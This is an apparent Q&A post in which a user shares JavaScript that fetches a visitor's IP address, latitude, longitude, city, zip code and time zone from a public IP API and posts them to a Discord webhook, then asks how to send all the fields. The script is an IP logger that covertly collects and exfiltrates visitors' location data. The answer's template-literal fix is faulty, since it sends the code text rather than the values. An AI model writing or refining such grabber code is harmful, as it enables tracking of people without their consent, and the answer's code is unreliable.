# I don't know how to include all infomation in "content:" (javascript)

Tags: javascript, discord, ip, webhooks

I don't know how to include all infomation from lines 7 to 16 in the "content:", if someone can help, I would like it to be in the embed as in the screenshot below

this is the script

```
var ip = '';
fetch('https://freeipapi.com/api/json')
.then(function(response) {
    return response.json();
})
.then(function(data) {
    IPv = data.ipVersion;
    ip = data.ipAddress;
    latitude = data.latitude;
    longitude = data.longitude;
    country = data.countryName
    countryCode = data.countryCode;
    timeZone = data.timeZone;
    zipCode = data.zipCode;
    city = data.cityName;
    region = data.regionName;
    var webhook = 'https://canary.discord.com/api/webhooks/...'
    var message = {
        "content": IPv
      }

    fetch(webhook, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(message)
    });
});
```

I want to have all information in "content:", to send this information on discord webhook

https://i.stack.imgur.com/8fbxv.png

Answer (score 0):

Add `content`'s value as [Template literals (Template strings)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals).

```js
var message = {
    "content": `IPv = data.ipVersion;
    ip = data.ipAddress;
    latitude = data.latitude;
    longitude = data.longitude;
    country = data.countryName
    countryCode = data.countryCode;
    timeZone = data.timeZone;
    zipCode = data.zipCode;
    city = data.cityName;
    region = data.regionName;`
}

console.log(JSON.stringify(message));
```